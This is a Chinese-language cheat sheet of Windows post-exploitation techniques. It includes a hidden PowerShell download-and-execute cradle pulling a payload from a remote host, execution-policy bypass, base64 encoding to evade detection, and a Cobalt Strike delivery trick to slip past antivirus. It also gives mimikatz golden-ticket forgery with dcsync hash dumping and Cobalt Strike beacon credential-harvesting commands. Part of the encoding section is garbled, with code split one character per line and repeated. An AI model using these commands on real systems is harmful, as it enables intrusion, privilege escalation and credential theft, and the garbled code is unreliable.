1.屏蔽控制台应用程序的窗口:
pragma comment(linker,"/subsystem:“windows” /entry:“mainCRTStartup”")
2.查询用户信息:
wmic useraccount list full
3.修改powershell安全策略:
set-executionpolicy -executionpolicy RemoteSigned
#策略:bypass 不警告;unrestricted警告
4.powershell 远程下载运行:
powershell.exe -nop -w hidden -c “IEX((new-object
net.webclient).downloadstring('http://192.168.1.8:80/fafaft))”
#IEX=invoke-Expression
5.bypass绕过策略
powershell.exe -ExecutionPolicy bypass
6.Uni+base64转码绕过
$fileContent = “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.8:80/fafaft’))””
b
y
t
e
s
=
[
S
y
s
t
e
m
.
T
e
x
t
.
E
n
c
o
d
i
n
g
]
:
:
U
n
i
c
o
d
e
.
G
e
t
B
y
t
e
s
(
bytes = [System.Text.Encoding]::Unicode.GetBytes(
bytes=[System.Text.Encoding]::Unicode.GetBytes(fileContent)
e
n
c
o
d
e
d
C
o
m
m
a
n
d
=
[
C
o
n
v
e
r
t
]
:
:
T
o
B
a
s
e
64
S
t
r
i
n
g
(
encodedCommand = [Convert]::ToBase64String(
encodedCommand=[Convert]::ToBase64String(bytes)
echo $encodedCommand
运行:
powershell -enc $encodedCommand
7.cs web-delivery 火绒绕过
$123 =powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.8:80/fafaft’)
8.mimikatz黄金票据提权
requirements:
a.krbtgt(域管理员账户)的hash
b.(域内用户的)本地admin
c.域的sid
steps:
a. 信息搜集
privilege::Debug #测试
kerberos::purge #清空票据
kerberos::list #列出票据
whoami /all #获得域sid
b.制作票据
kerberos::golden /user:Administrator /domin:你的域
/sid:管理员的sid /krbtgt:krbtgt帐户的hash /ticket:xxx.kirbi
c.导出密码
kerberos::ptt xxx.kirbi #利用票据(时限约20min)
kerberos::list
lsadump::dcsync /domain:你的域 /user:想要被导出hash的用户
TIP :dcsync要隔几分钟后食用或重启mimikatz
人造票据仅存在与admin权限的命令行内
否则error 5权限不足
9.cs beacon access
a.make token:制作用于访问windows远程资源的令牌
eg.windows共享
b.One-liner Run: oneliner x86(x64) listener
在受控机开启一个一次性的web服务并托管着木马
随即可用生成脚本在被控段创建新会话
run xxx
c.Mimikatz:logonpasswords
运行mimikatz的logonpasswords
d.spawn as 使用其他用户权限生成会话
requirements: user; pwd; domain-name ;listener
Commend:spawnas 域名\用户名 密码 listener
e.dump hashes: hashdump
f.elevate提权
g.golden ticket 生成伪造票据
10.cs beacon explore
a.Browser Pivot :当被控浏览ie时以其为代理免密登录ta在看的网站